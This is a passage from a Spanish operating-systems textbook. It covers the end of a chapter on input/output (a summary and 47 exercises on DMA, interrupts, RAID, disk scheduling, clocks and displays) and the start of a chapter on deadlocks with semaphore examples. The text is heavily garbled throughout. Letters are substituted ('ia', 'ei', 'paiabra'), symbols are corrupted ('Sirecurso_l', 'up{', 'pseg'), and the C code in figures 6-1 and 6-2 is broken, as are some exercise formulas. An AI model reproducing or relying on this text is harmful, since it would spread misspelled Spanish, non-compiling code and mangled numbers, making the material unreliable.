coiaboradores, 2007), reaiizar programación de muitimedia haciendo uso eficiente de ia energía (Yuan 
y Nahrstedt, 2006), e inciuso hacer que una cámara integrada detecte si hay aiguien viendo ia pantaiia y 
desconectada cuando nadie ia esté viendo (Daiton y Eiiis, 2003). En ei extremo de bajo rendimiento, 
otro tema popuiar es ei uso de ia energía en ias redes de monitoreo (M in y coiaboradores, 2007; Wang 
y X iao, 2006). A i otro extremo dei espectro, guardar energía en grandes granjas de servidores también 
es de interés (Fan y coiaboradores, 2007; Toientino y coiaboradores, 2007). 


5.10 RESUMEN 

A menudo ias operaciones de entrada/sai i da son un tema ignorado pero importante. Una fracción 
consi derabie de cuaiquier sistema operativo está reiacionada con ias operaciones de E/S. Estas ope¬ 
raciones se pueden iievar a cabo en una de tres formas. En primer iugar está ia E/S programada, en 
ia que ia CPU principa) recibe o envía cada byte o paiabra y entra a un cicio estrecho para esperar 
hasta que pueda obtener o enviar ei siguiente byte. En segundo iugar está ia E/S controiada por in¬ 
terrupciones, en ia que ia CPU inicia una transferencia de E/S para un carácter o paiabra y se pone 
a hacer aigo más hasta que iiega una interrupción indicando que se compietó ia operación de E/S. 
En tercer iugar está ei DM A, en ei que un chip separado administra i a transferencia compieta de un 
bioque de datos, y recibe una interrupción sóio cuando se ha transferido todo ei bioque compieto. 
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La E/S se puede estructurar en cuatro niveles: los procedimientos de servicio de interrupcio¬ 
nes, los controladores de dispositivos, el software de E/S independiente del dispositivo, y las biblio¬ 
tecas de E/S y el uso de colas que se ejecutan en espacio de usuario. Los controladores de 
dispositivos se encargan de los detalles de operación de los dispositivos, y proporcionan interfaces 
uniformes para el resto del sistema operativo. El software de E/S independiente del dispositivo rea¬ 
liza cosas como el uso de búfer y el reporte de errores. 

Los discos vienen en una variedad de ti pos, incluyendo los discos magnéticos, RAIDs y varios 
tipos de discos ópticos. A menudo se pueden utilizar algoritmos de planificación del brazo del dis¬ 
co para mejorar su rendimiento, pero la presencia de la geometría virtual complica las cosas. Al co¬ 
locar dos discos para formar un par, se puede construir un medio de almacenamiento estable con 
ciertas propiedades útiles. 

Los relojes se utilizan para llevar la cuenta de la hora real y limitan el tiempo que se pueden 
ejecutar los procesos, manejan temporizadores guardianes y realizan la contabilidad. 

Las terminales orientadas a caracteres tienen una variedad de cuestiones relacionadas con los 
caracteres especiales que se pueden introducir, y las secuencias de escape especiales que se pueden 
imprimir. La entrada puede estar en modo crudo o cocido, dependiendo de cuánto control desee el 
programa sobre la entrada. Las secuencias de escape en la salida controlan el movimiento del cur¬ 
sor y permiten insertar y eliminar texto en la pantalla. 

La mayoría de los sistemas UNIX utilizan el Sistema X Window como la base de la interfaz de 
usuario. Consiste en programas enlazados con bibliotecas especiales que emiten comandos de di¬ 
bujo, y un servidor X que escribe en la pantalla. 

M uchas computadoras personales utilizan GUIs para mostrar la información al usuario. Éstas 
se basan en el paradigma WIM P: ventanas, iconos, menús y un dispositivo señalador. Los progra¬ 
mas basados en GUI por lo general son controlados por eventos, en donde los eventos de teclado, 
ratón y otros dispositivos se envían al programa para procesarlos tan pronto como ocurren. En los 
sistemas UNIX, las GUIs casi siempre se ejecutan encima deX. 

Los clientes delgados tienen algunas ventajas en comparación con las PCs estándar, siendo las 
más notables su simplicidad y menor necesidad de mantenimiento por parte de los usuarios. Los ex¬ 
perimentos con el cliente delgado TH INC han demostrado que con cinco primitivas simples es po¬ 
sible construir un cliente con un buen rendimiento, incluso para el video. 

Por último, la administración de la energía es una cuestión importante para las computadoras 
notebook, ya que los tiempos de vida de las baterías son limitados. El sistema operativo puede em¬ 
plear varias técnicas para reducir el consumo de energía. Los programas también pueden ayudar al 
sacrificar cierta calidad por tiempos de vida más largos para las baterías. 


PROBLEMAS 

1 . Los avances en la tecnología de los chips han hecho posible colocar todo un controlador, in¬ 
cluyendo la lógica de acceso al bus, en un chip económico. ¿Cómo afecta eso al modelo de la fi¬ 
gura 1-5? 

2 . Dadas las velocidades listadas en la figura 5-1, ¿es posible explorar documentos desde un escáner y 
transmitirlos sobre una red 802.llg a la máxima velocidad? Defienda su respuesta. 
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3 . La figura 5-3(b) muestra una forma de tener E/S por asignación de memoria, inciuso en presencia 
de buses separados para ia memoria y ios dispositivos de E/S, a saber, primero se prueba ei bus de 
memoria y si faiia, se prueba ei bus de E/S. Un astuto estudiante de ciencias computacionaies ha 
ideado una mejora sobre esta idea: probar ambos en paraieio, para agiiizar ei proceso de acceder a 
ios dispositivos de E/S. ¿Qué piensa usted sobre esta idea? 

4 . Suponga que un sistema utiiiza DM A para ia transferencia de datos dei controiador dei disco a ia me¬ 
moria principai. Suponga además que se requieren t^ nseg en promedio para adquirir ei bus, y tj nseg 
par transferir una paiabra a través dei bus (tj » tj). U na vez que ia CPU ha programado ei controia¬ 
dor de DMA, ¿cuánto tiempo se requiere para transferir 1000 paiabras dei controiador de disco a ia 
memoria principai, si (a) se utiiiza ei modo de una paiabra a ia vez, (b) se utiiiza ei modo ráfaga? Su¬ 
ponga que para comandar ei controiador de disco se requiere adquirir ei bus para enviar una paiabra, 
y para reconocer una transferencia también hay que adquirir ei bus para enviar una paiabra. 

5 . Suponga que una computadora puede ieer o escribir una paiabra de memoria en 10 nseg. Suponga 
además que cuando ocurre una interrupción, se meten en ia piia ios 32 registros más ei contador dei 
programa y ei PSW. ¿Cuái es ei número máximo de interrupciones por segundo que puede procesar 
esta máquina? 

6 . Los arquitectos de C PU s saben que ios escritores de sistemas operativos odian ias interrupciones im¬ 
precisas. Una manera de compiacer a ios escritores de SO es que ia CPU deje de emitir nuevas ins¬ 
trucciones cuando se señaie una interrupción, pero que permita que todas ias instrucciones que se 
están ejecutando terminen y después obiigue a que se produzca ia interrupción. ¿Tiene este méto¬ 
do aiguna desventaja? Expiique su respuesta. 

7 . En ia figura 5-9(b), ia interrupción no se reconoce sino hasta después de que se haya enviado ei si¬ 
guiente carácter a ia impresora. ¿Podría haberse reconocido de iguai forma justo ai inicio dei proce¬ 
dimiento de servicio de interrupciones? De ser así, mencione una razón de hacerio ai finai, como en 
ei texto. Si no es así, ¿por qué no? 

8 . U na computadora tiene una iínea de tubería de tres etapas, como se muestra en ia figura l-6(a). En 
cada cicio de reioj se obtiene una nueva instrucción de ia memoria en ia dirección a ia que apunta 
ei PC, se coioca ia nueva instrucción en ia tubería y se avanza ei PC. Cada instrucción ocupa exac¬ 
tamente una paiabra de memoria. Las instrucciones que ya están en ia tubería se avanzan una etapa. 
Cuando ocurre una interrupción, ei PC actuai se mete en ia piia y ai PC se ie asigna ia dirección dei 
manejador de interrupciones. Después ia tubería se despieza una etapa a ia derecha, se obtiene ia pri¬ 
mera instrucción dei manejador de interrupciones y se coioca en ia tubería. ¿Tiene esta máquina in¬ 
terrupciones precisas? Defienda su respuesta. 

9 . U na página ordinaria de texto contiene 50 iíneas de 80 caracteres cada una. Imagine que cierta im¬ 
presora puede imprimir 6 páginas por minuto, y que el tiempo para escribir un carácter en el regis¬ 
tro de salida de la impresora es tan corto que puede ignorarse. ¿Tiene sentido operar esta impresora 
mediante la E/S controlada por eventos, si cada carácter impreso requiere una interrupción que tar¬ 
da 50 pseg en ser atendida? 

10 . Explique cómo un SO puede facilitar la instalación de un nuevo dispositivo sin necesidad de volver 
a compilar el SO. 

11 . ¿En cuál de los cuatro niveles de software de E/S se realiza cada una de las siguientes acciones? 

(a) Calcular la pista, sector y cabeza para una lectura de disco. 
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(b) Escribir comandos en ios registros de dispositivo. 

(c) Comprobar si ei usuario tiene permiso de utiiizar ei dispositivo. 

(d) Convertir ios enteros binarios aASCII para imprimidos. 

12 . Una red de área iocai se utiiiza de ia siguiente manera. Ei usuario emite una iiamada ai sistema pa¬ 
ra escribir paquetes de datos en ia red. Después ei sistema operativo copia ios datos en un búfer dei 
kernei. Luego copia ios datos a ia tarjeta controiadora de red. Cuando todos ios bytes están seguros 
dentro dei controiador, se envían a través de ia red a una veiocidad de 10 megabits/seg. Ei contro- 
iador de red receptor aimacena cada bit un microsegundo después de enviado. Cuando iiega ei úiti- 
mo bit se interrumpe ia CPU de destino, y ei kernei copia ei paquete recién iiegado a un búfer dei 
kernei para inspeccionado. U na vez que averigua para cuái usuario es ei paquete, ei kernei copia ios 
datos en ei espacio de usuario. Si suponemos que cada interrupción y su procesamiento asociado re¬ 
quiere 1 mseg, que ios paquetes son de 1024 bytes (ignore ios encabezados) y que para copiar un 
byte se requiere 1 pseg, ¿cuái es ia veiocidad máxima a ia que un proceso puede enviar ios datos a 
otro? Suponga que ei emisor se bioquea hasta que se termine ei trabajo en ei iado receptor y que se 
devueiveunaseñai de reconocimiento. Parasimpiificar, supongaqueei tiempo para obtener de vuei- 
ta ei reconocimiento es tan pequeño que se puede ignorar. 

13 . ¿Por qué ios archivos de saiida para ia impresora normaimente se ponen en coia en ei disco antes de 
imprimidos? 

14 . Ei nivei 3 de RAID puede corregir errores de un solo bit, utilizando sólo una unidad de paridad. 
¿Cuál es el objetivo del nivel 2 de RAID? Después de todo, también puede corregir sólo un errory 
requiere más unidades para hacerlo. 

15 . Un RAID puede fallar si dos o más unidades fallan dentro de un intervalo de tiempo corto. Supon¬ 
ga que la probabilidad de que una unidad falle en una hora específica es p. ¿Cuál es la probabilidad 
de que falle un RAID de k unidades en una hora específica? 

16 . Compare los niveles 0 a 5 de RAID con respecto al rendimiento de lectura, de escritura, sobrecarga 
de espacio y confiabilidad. 

17 . ¿Por qué los dispositivos de almacenamiento ópticos son intrínsecamente capaces de obtener una 
densidad mayor de datos que los dispositivos de almacenamiento magnéticos? Nota: este problema 
requiere cierto conocimiento de física de secundaria y acerca de cómo se generan los campos mag¬ 
néticos. 

18 . ¿C uáles son las ventajas y desventajas de los discos ópticos, en comparación con los discos magné¬ 
ticos? 

19 . Si un controlador de disco escribe los bytes que recibe del disco a la memoria, tan pronto como los 
recibe, sin uso interno de búfer, ¿puede el entrelazado ser útil? Explique. 

20 . Si un disco tiene doble entrelazado, ¿necesita también desajuste de cilindros para evitar pasar por al¬ 
to información al realizar una búsqueda de pista a pista? Explique su respuesta. 

21 . Considere un disco magnético que consiste de 16 cabezas y 400 cilindros. Este disco está dividido 
en zonas de 100 cilindros, en donde los cilindros en distintas zonas contienen 160, 200, 240 y 280 
sectores, respectivamente. Suponga que cada sector contiene 512 bytes, que el tiempo de búsque¬ 
da promedio entre cilindros adyacentes es de 1 mseg y que el disco gira a 7200 RPM. Calcule 
(a) la capacidad del disco; (b) el desajuste óptimo de pistas y (c) la velocidad máxima de transfe¬ 
rencia de datos. 
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22 . U n fabricante de discos tiene dos discos de 5.25 puigadas, y cada uno de eiios tiene 10,000 ciiindros. 
Ei más nuevo tiene ei dobie de ia densidad de grabación iineai dei más antiguo. ¿Qué propiedades 
de disco son mejores en ia unidad más reciente y cuáies son iguaies? 

23 . U n fabricante de computadoras decide rediseñar ia tabia de particiones dei disco duro de un Pentium 
para proporcionar más de cuatro particiones. ¿Cuáies son aigunas consecuencias de este cambio? 

24 . Las peticiones de disco iiegan ai controiador de disco para ios ciiindros 10, 22, 20, 2, 40, 6 y 38, en 
ese orden. Una búsqueda requiere 6 mseg por cada ciiindro despiazado. Determine cuánto tiempo 
de búsqueda se requiere para 

(a) Primero en iiegar, primero en ser atendido. 

(b) Ei ciiindro más cercano a continuación. 

(c) Aigoritmo dei eievadorfai principio se mueve hacia arriba). 

En todos ios casos, ei brazo está ai principio en ei ciiindro 20. 

25 . Una iigera modificación dei aigoritmo dei eievador para pianificar peticiones de disco es expiorar 
siempre en ia misma dirección. ¿En qué aspecto es mejor este aigoritmo modificado que ei aigorit¬ 
mo dei eievador? 

26 . En ei anáiisis dei aimacenamiento estabie mediante ei uso de RAM no voiátii, se pasó por aito 
ei siguiente punto. ¿Qué ocurre si se compieta ia escritura estabie, pero ocurre una faiia antes de 
que ei sistema operativo pueda escribir un número de bioque inváiido en ia RAM no voiátii? 
¿Arruina esta condición de competencia ia abstracción dei aimacenamiento estabie? Expiique su 
respuesta. 

27 . En ei anáiisis sobre aimacenamiento estabie, se demostró que ei disco se puede recuperar en un es¬ 
tado consistente (o ia escritura se compieta, o no se iieva a cabo) si ocurre una faiia de ia CPU du¬ 
rante una escritura. ¿Se mantiene esta propiedad si ia CPU faiia de nuevo durante un procedimiento 
de recuperación? Expiique su respuesta. 

28 . Ei manejador de interrupciones de reioj en cierta computadora requiere 2 mseg (inciuyendo ia so¬ 
brecarga de ia conmutación de procesos) por cada puiso de reioj. Ei reioj opera a 60 Hz. ¿Qué frac¬ 
ción de ia CPU está dedicada ai reioj? 

29 . Una computadora utiiiza un reioj programabie en modo de onda cuadrada. Si se utiiiza un reioj 
de 500 M Hz, ¿cuái debe ser ei vaior dei registro contenedor para iograr una resoiución de reioj de 

(a) un miiisegundo (un puiso de reioj cada miiisegundo)? 

(b) 100 microsegundos? 

30 . Un sistema simuia varios reiojes ai encadenar todas ias peticiones de reioj en conjunto, como se 
muestra en ia figura 5-34. Suponga que ei tiempo actuai es 5000 y que hay peticiones de reioj pen¬ 
dientes para ios tiempos 5008, 5012, 5015, 5029 y 5037. M uestre ios vaiores dei E ncabezado dei re¬ 
ioj, ia Hora actuai, y ia Siguiente señai en ios tiempos 5000, 5005 y 5013. Suponga que iiega una 
nueva señai (pendiente) en ei tiempo 5017 para 5033. M uestre ios vaiores dei Encabezado dei reioj, 
ia H ora actuai y ia Siguiente señai en ei tiempo 5023. 

31 . M uchas versiones de LINUX utilizan un entero de 32 bits sin signo para llevar la cuenta del tiempo 
como el número de segundos transcurridos desde el origen del tiempo. ¿Cuándo terminarán estos 
sistemas (año y mes)? ¿Espera usted que esto realmente ocurra? 
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32 . Una terminal de mapa de bits contiene 1280 por 960 pixeles. Para desplazarse por una ventana, la 
CPU (oel controlador) debe desplazar todas las líneas de texto hacia arriba, al copiar sus bits de una 
parte de la RA M de video a otra. Si una ventana específica es de 60 líneas de altura por 80 caracte¬ 
res de anchura (5280 caracteres en total), y el cuadro de un carácter es de 8 pixeles de anchura por 
16 pixeles de altura, ¿cuánto tiempo se requiere para desplazar toda la ventana, a una velocidad de 
copia de 50 nseg por byte? Si todas las líneas tienen 80 caracteres de largo, ¿cuál es la tasa de trans¬ 
ferencia de baudios equivalente de la terminal? Para colocar un carácter en la pantalla se requieren 
5 pseg. ¿Cuántas líneas por segundo se pueden mostrar? 

33 . Después de recibir un carácter SU PR (SIGINT), el controlador de la pantalla descarta toda la salida 
que haya en la cola para esa pantalla. ¿Por qué? 

34 . En la pantalla a color de la IBM PC original,al escribir en la RAM de video en cualquier momento 
que no fuera durante el retrazado vertical del haz del CRT, aparecían puntos desagradables por toda 
la pantalla. U na imagen de pantalla es de 25 por 80 caracteres, cada uno de los cuales se ajusta a un 
cuadro de 8 pixeles por 8 pixeles. Cada fila de 640 pixeles se dibuja en una sola exploración hori¬ 
zontal del haz, que requiere 63.6 pseg, incluyendo el retrazado horizontal. La pantalla se vuelve a 
dibujar 60 veces por segundo, y en cada una de esas veces se requiere un periodo de retrazado ver¬ 
tical para regresar el haz a la parte superior. ¿Durante qué fracción de tiempo está disponible la 
RAM de video para escribir? 

35 . Los diseñadores de un sistema de computadora esperaban que el ratón se pudiera mover a una velo¬ 
cidad máxima de 20 cm/seg. Si un mickey es de 0.1 mm y cada mensaje del ratón es de 3 bytes, 
¿cuál es la máxima velocidad de transferencia de datos del ratón, suponiendo que cada mickey se 
reporte por separado? 

36 . Los colores aditivos primarios son rojo, verde y azul, lo cual significa que se puede fomar cual¬ 
quier color a partir de una superposición lineal de estos colores. ¿Es posible que alguien pudiera 
tener una fotografía a color que no se pudiera representar mediante el uso de color completo de 
24 bits? 

37 . U na forma de colocar un carácter en una pantalla con mapa de bits es utilizar bitbit desde una tabla 
de tipos de letras. Suponga que un tipo de letra específico utiliza caracteres de 16 x 24 pixeles en 
color RGB verdadero. 

(a) ¿Cuánto espacio en la tabla de tipos de letras ocupa cada carácter? 

(b) Si para copiar un byte se requieren 100 nseg, incluyendo la sobrecarga, ¿cuál es la velocidad de 
transferencia de salida para la pantalla en caracteres/seg? 

38 . Suponiendo que se requieren 10 nseg para copiar un byte, ¿cuánto tiempo se requiere para retrazar 
por completo una pantalla con asignación de memoria, en modo de texto de 80 caracteres x 25 lí¬ 
neas? ¿Y una pantalla gráfica de 1024 x 768 pixeles con colores de 24 bits? 

39 . En la figura 5-40 hay una clase para RegisterClass. En el código X Window/ correspondiente de la 
figura 5-38, no hay dicha llamada o algo parecido. ¿Por qué no? 

40 . En el texto vimos un ejemplo sobre cómo dibujar un rectángulo en la pantalla mediante la GDI de 
Windows: 

Rectangle(hdc, xizq, ysup, xder, yinf); 
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¿Hay una verdadera necesidad por el primer parámetro (hdc), y de ser así, cuál es? Después de to¬ 
do, las coordenadas del rectángulo se especifican de manera explícita como parámetros. 

41 . U na terminal THINC se utiliza para mostrar una página Web que contenga una caricatura animada 
de 400 pixelesx 160 pixeles a una velocidad de 10 cuadros/seg. ¿Qué fracción de una conexión Fast 
Ethernet de 100 M bps se consume al mostrar la caricatura? 

42 . Se ha observado que el sistema THINC funciona bien con una red de 1 M bps en una prueba. ¿Pue¬ 
de haber problemas en una situación multiusuario? Sugerencia: Considere que un gran número de 
usuarios ven un programa de TV y que el mismo número de usuarios navegan por World Wide Web. 

43 . Si el máximo voltaje de una CPU (V) se recorta a V/n, su consumo de energía disminuye a 1/n^ de 
su valor original, y su velocidad de reloj disminuye a 1/n de su valor original. Suponga que un usua¬ 
rio está escribiendo a 1 carácter/seg, pero que el tiempo de CPU requerido para procesar cada ca¬ 
rácter es de 100 mseg. ¿Cuál es el valor óptimo de n y cuál es el correspondiente ahorro de energía 
en porcentaje, comparado con la opción de no cortar el voltaje? Suponga que una CPU inactiva no 
consume energía. 

44 . Una computadora notebook se configura para sacar el máximo provecho de las características de 
ahorro de energía, incluyendo apagar la pantalla y el disco duro después de periodos de inactividad. 
Algunas veces un usuario ejecuta programas UNIX en modo de texto, y otras veces utiliza el Siste¬ 
ma X Window. Le sorprende descubrir que la vida de la batería es mucho mejor cuando utiliza pro¬ 
gramas de sólo texto. ¿Por qué? 

45 . Escriba un programa que simule un almacenamiento estable. Utilice dos archivos extensos de lon¬ 
gitud fija en su disco para simular los dos discos. 

46 . Escriba un programa para implementar los tres algoritmos de planificación del brazo del disco. Es¬ 
criba un programa controlador que genere una secuencia de números de cilindro (0 a 999) al azar, 
que ejecute los tres algoritmos para esta secuencia e imprima la distancia total (número de cilin¬ 
dros) que necesita el brazo para desplazarse en los tres algoritmos. 

47 . Escriba un programa para implementar varios temporizadores usando un solo reloj. La entrada para 
este programa consiste en una secuencia de cuatro tipos de comandos (5 <int>, T, E <int>, P): S 
<int> establece el tiempo actual a <int>: T es un pulso de reloj: y E <int> programa una señal para 
que ocurra en el tiempo <int>: P imprime los valores de Tiempo actual. Siguiente señal y Encabe¬ 
zado de reloj. Su programa también debe imprimir una instrucción cada vez que sea tiempo de ge¬ 
nerar una señal. 
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Los sistemas computacionales están llenos de recursos que pueden ser utilizados por sólo un pro¬ 
ceso a la vez. A Igunos ejemplos comunes son las impresoras, las unidades de cinta y las ranuras en 
los tableros internos del sistema. Cuando dos procesos escriben de manera simultánea en la impre¬ 
sora se producen incoherencias. Si dos procesos utilizan la misma entrada en la tabla del sistema de 
archivos invariablemente se corrompe el sistema de archivos. En consecuencia, todos los sistemas 
operativos tienen la habilidad de otorgar (en forma temporal) a un proceso el acceso exclusivo a 
ciertos recursos. 

Para muchas aplicaciones, un proceso necesita acceso exclusivo no sólo a un recurso, sino a 
varios. Por ejemplo, suponga que cada uno de dos procesos quiere grabar un documento digitaliza¬ 
do en un CD. El proceso A pide permiso para utilizar el escáner y se le otorga. El proceso B se pro¬ 
grama de manera distinta y solicita primero el grabador de CDs, y también se le otorga. Ahora A 
pide el grabador de CDs, pero la petición se rechaza hasta queB lo libere. Por desgracia, en vez de 
liberar el grabador de CD, B pide el escáner. En este punto ambos procesos están bloqueados y per¬ 
manecerán así para siempre. A esta situación se le conoce como interbloqueo. 

Los interbloqueos también pueden ocurrir entre máquinas. Por ejemplo, muchas oficinas tie¬ 
nen una red de área local con muchas computadoras conectadas. A menudo, los dispositivos como 
escáneres, grabadores de CD, impresoras y unidades de cinta se conectan a la red como recursos 
compartidos, disponibles para cualquier usuario en cualquier equipo. Si estos dispositivos se pue¬ 
den reservar de manera remota (es decir, desde el equipo doméstico del usuario), pueden ocurrir los 
mismos tipos de interbloqueos antes descritos. Las situaciones más complicadas pueden ocasionar 
interbloqueos que involucren a tres, cuatro o más dispositivos y usuarios. 
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Los interbloqueos pueden ocurrir en una variedad de situaciones, además de solicitar disposi¬ 
tivos de E/S dedicados. Por ejemplo, en un sistema de bases de datos, un programa puede tener que 
bloquear varios registros que esté utilizando para evitar condiciones de competencia. Si el proceso 
A bloquea el registro R1 y el proceso B bloquea el registro R2, y después cada proceso trata de blo¬ 
quear el registro del otro, también tenemos un interbloqueo. Por ende, los interbloqueos pueden 
ocurrir en los recursos de hardware o de software. 

En este capítulo analizaremos varios tipos de interbloqueos, veremos cómo surgen y estudiare¬ 
mos algunas formas de prevenirlos o evitarlos. Aunque este libro es sobre los interbloqueos en el 
contexto de los sistemas operativos, también ocurren en los sistemas de bases de datos y en muchos 
otros contextos en las ciencias computacionales, por lo que en realidad este material se puede apli¬ 
car a una amplia variedad de sistemas de multiproceso. Se ha escrito mucho sobre los interbloqueos. 
Dos bibliografías sobre el tema han aparecido en Operating Systems Review y deben consultarse en 
busca de referencias (Newton, 1979; y Zobel, 1983). Aunque estas bibliografías son antiguas, la ma¬ 
yor parte del trabajo sobre los interbloqueos se hizo mucho antes de 1980, por lo que aún son de 
utilidad. 


6.1 RECURSOS 

Una clase principal de interbloqueos involucra a los recursos, por lo que para empezar nuestro es¬ 
tudio veremos lo que son. Los interbloqueos pueden ocurrir cuando a los procesos se les otorga ac¬ 
ceso exclusivo a los dispositivos, registros de datos, archivos, etcétera. Para que el análisis sobre 
los interbloqueos sea lo más general posible, nos referiremos a los objetos otorgados como recur¬ 
sos. Un recurso puede ser un dispositivo de hardware (por ejemplo, una unidad de cinta) o una pie¬ 
za de información (como un registro bloqueado en una base de datos). Por lo general, una 
computadora tendrá muchos recursos que se pueden adquirir. Para algunos recursos puede haber 
disponibles varias instancias idénticas, como tres unidades de cinta. Cuando hay disponibles varias 
copias de un recurso, se puede utilizar sólo una de ellas para satisfacer cualquier petición de ese 
recurso. En resumen, un recurso es cualquier cosa que se debe adquirir, utilizar y liberar con el 
transcurso del tiempo. 

6.1.1 Recursos apropiativos y no apropiativos 

Los recursos son dedos tipos: apropiativos y no apropiativos. Un recurso apropiativo es uno que 
se puede quitar al proceso que lo posee sin efectos dañinos. La memoria es un ejemplo de un re¬ 
curso apropiativo. Por ejemplo, considere un sistema con 256 M B de memoria de usuario, una im¬ 
presora y dos procesos de 256 M B, cada uno de los cuales quiere imprimir algo. El proceso A 
solicita y obtiene la impresora, y después empieza a calcular los valores a imprimir. Antes deter¬ 
minar con el cálculo, excede su quantum de tiempo y se intercambia por el otro proceso. 

Ahora el proceso B se ejecuta y trata (sin éxito) de adquirir la impresora: se crea una situación 
potencial de interbloqueo, ya que A tiene la impresora y B tiene la memoria, y ninguno puede pro¬ 
ceder sin el recurso que el otro posee. Por fortuna, es posible apropiarse (quitar) de la memoria de 
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B al intercambiarlo y colocar el proceso A devuelta. Ahora A se puede ejecutar, realizar su impre¬ 
sión y después liberar la impresora. Así no ocurre ningún interbloqueo. 

Por el contrario, un recurso no apropiativo es uno que no se puede quitar a su propietario ac¬ 
tual sin hacer que el cómputo falle. Si un proceso ha empezado a quemar un CD-ROM y tratamos 
de quitarle de manera repentina el grabador de CD y otorgarlo a otro proceso, se obtendrá un CD 
con basura. Los grabadores de CD no son apropiad vos en un momento arbitrario. 

En general, los interbloqueos involucran a los recursos no apropiativos. Los interbloqueos po¬ 
tenciales que pueden involucrar a los recursos apropiativos por lo general se pueden resolver me¬ 
diante la reasignación de los recursos de un proceso a otro. Por ende, nuestro análisis se enfocará 
en los recursos no apropiativos. 

La secuencia de eventos requerida para utilizar un recurso se proporciona a continuación, en 
un formato abstracto. 

1. Solicitar el recurso. 

2. Utilizar el recurso. 

3. Liberar el recurso. 

Si el recurso no está disponible cuando se le solicita, el proceso solicitante se ve obligado a espe¬ 
rar. En algunos sistemas operativos, el proceso se bloquea de manera automática cuando falla la so¬ 
licitud de un recurso, y se despierta cuando el recurso está disponible. En otros sistemas, la solicitud 
falla con un código de error y depende del proceso que hizo la llamada decidir si va a esperar un 
poco e intentar de nuevo. 

Un proceso al que se le ha negado la petición de un recurso por lo general permanece en un 
ciclo estrecho solicitando el recurso, después pasa al estado inactivo y después intenta de nuevo. 
A unque este proceso no está bloqueado, para toda intención y propósito es como si lo estuviera, de¬ 
bido a que no puede realizar ningún trabajo útil. En nuestro siguiente análisis vamos a suponer que 
cuando a un proceso se le niega un recurso solicitado pasa al estado inactivo. 

La naturaleza exacta de solicitar un recurso es en gran medida dependiente del sistema. En al¬ 
gunos sistemas se proporciona una llamada al sistema request para permitir que los procesos pidan 
los recursos en forma explícita. En otros, los únicos recursos que conoce el sistema operativo son los 
archivos especiales que sólo un proceso puede tener abiertos en un momento dado. Éstos se abren 
mediante la llamada al sistema open ordinaria. Si el archivo ya está en uso, el proceso que llama es 
bloqueado hasta que su propietario actual lo cierra. 


6.1.2 Adquisición de recursos 

Para ciertos tipos de recursos, como los registros de una base de datos, es responsabilidad de los 
procesos de usuario administrar su uso. Una manera de permitir que los usuarios administren los re¬ 
cursos es asociar un semáforo con cada recurso. Estos semáforos se inicializan con 1. Se pueden 
utilizar mutexes de igual forma. Los tres pasos antes listados se implementan como una operación 
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down en el semáforo para adquirir ei recurso, usario y finaimente reaiizar una operación up en ei 
recurso para iiberario. Estos pasos se muestran en ia figura 6-l(a). 


typedef int semáforo; 
semáforo recurso_l; 


typedef int semáforo; 
semáforo recurso_l; 
semáforo recurso_2; 


void proceso_A(void) { 
down(Sirecurso_l); 
usar_recurso_l(); 
up{&recurso_l); 

} 


(a) 


void proceso_A(void) { 
down(Sirecurso_l); 
down(Sirecurso_2); 
usar_ambos_recursos(); 
up{&recurso_2); 
up{&recurso_l); 

} 


(b) 


Figura 6-1. Uso de un semáforo para proteger los recursos, (a) U n recurso, (b) Dos re¬ 
cursos. 


Algunas veces los procesos necesitan dos o más recursos. Se pueden adquirir de manera se- 
cuencial, como se muestra en la figura 6-l(b). Si se necesitan más de dos recursos, sólo se adquie¬ 
ren uno después del otro. 

Hasta ahora todo está bien. M ientras sólo haya un proceso involucrado, todo funciona sin pro¬ 
blemas. Desde luego que con sólo un proceso, no hay necesidad de adquirir formalmente los recur¬ 
sos, ya que no hay competencia por ellos. 

Ahora consideremos una situación con dos procesos, A y B, y dos recursos. En la figura 6-2 se 
ilustran dos escenarios. En la figura 6-2(a), ambos procesos piden los recursos en el mismo orden. 
En la figura 6-2(b), los piden en un orden distinto. Esta diferencia puede parecer insignificante, pe¬ 
ro no lo es. 

En la figura 6-2(a), uno de los procesos adquirirá el primer recurso antes del otro. Después ese 
proceso adquirirá con éxito el segundo recurso y realizará su trabajo. Si el otro proceso intenta ad¬ 
quirir el recurso 1 antes de que sea liberado, el otro proceso simplemente se bloqueará hasta que es¬ 
té disponible. 

En la figura 6-2(b), la situación es distinta. Podría ocurrir que uno de los procesos adquiera am¬ 
bos recursos y en efecto bloquee al otro proceso hasta que termine. Sin embargo, también podría 
ocurrir que el proceso A adquiera el recurso 1 y el proceso B adquiera el recurso 2. A hora cada uno 
se bloqueará al tratar de adquirir el otro. Ninguno de los procesos se volverá a ejecutar. Esa situa¬ 
ción es un interbloqueo. 

Aquí podemos ver cómo lo que parece ser una diferencia insignificante en el estilo de codifi¬ 
cación (cuál recurso adquirir primero) constituye la diferencia entre un programa funcional y uno 
que falle de una manera difícil de detectar. Como los interbloqueos pueden ocurrir con tanta facili¬ 
dad, gran parte de la investigación se ha enfocado en las formas de lidiar con ellos. En este capítu¬ 
lo analizaremos los interbloqueos con detalle y lo que se puede hacer con ellos. 
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typedef int semáforo; 

semáforo recurso_l; 

semáforo recurso_2; 

void proceso_A{void) { 
down{Sirecurso_l); 
down{Sirecurso_2); 
usar_ambos_recursos(); 
up{&recurso_2); 
up{&recurso_l); 

} 

void proceso_B{void) { 
down{Sirecurso_l); 
down{Sirecurso_2); 
usar_ambos_recursos(); 
up{&recurso_2); 
up{&recurso_l); 

} 

(a) 


semáforo recurso_l; 

semáforo recurso_2; 

void proceso_A{void) { 
down{6irecurso_l); 
down{6irecurso_2); 
usar_ambos_recursos(): 
up(Sirecurso_2); 
up{Sirecurso_l); 

} 

void proceso_B{void) { 
down{6irecurso_2); 
down{6irecurso_l): 
usar_ambos_recursos(): 
up(6irecurso_l); 
up(6irecurso_2); 

} 

(b) 


Figura 6-2. (a) Código libre de interbloqueos, (b) Código con potencial de interblo¬ 
queo. 


6.2 INTRODUCCIÓN A LOS INTERBLOQUEOS 

El interbloqueo se puede definir formalmente de la siguiente manera: 

U n conjunto de procesos se encuentra en un interbloqueo si cada proceso en el conjunto está 
esperando un evento que sólo puede ser ocasionado por otro proceso en el conjunto. 

Debido a que todos los procesos están en espera, ninguno de ellos producirá alguno de los eventos 
que podrían despertar a cualquiera de los otros miembros del conjunto, y todos los procesos segui¬ 
rán esperando para siempre. Para este modelo suponemos que los procesos tienen sólo un hilo y que 
no hay interrupciones posibles para despertar a un proceso bloqueado. La condición sin interrup¬ 
ciones es necesaria para evitar que un proceso, que de cualquier otra forma estaría en interbloqueo, 
sea despertado por una alarma, por ejemplo, y después ocasione eventos que liberen a otros proce¬ 
sos en el conjunto. 

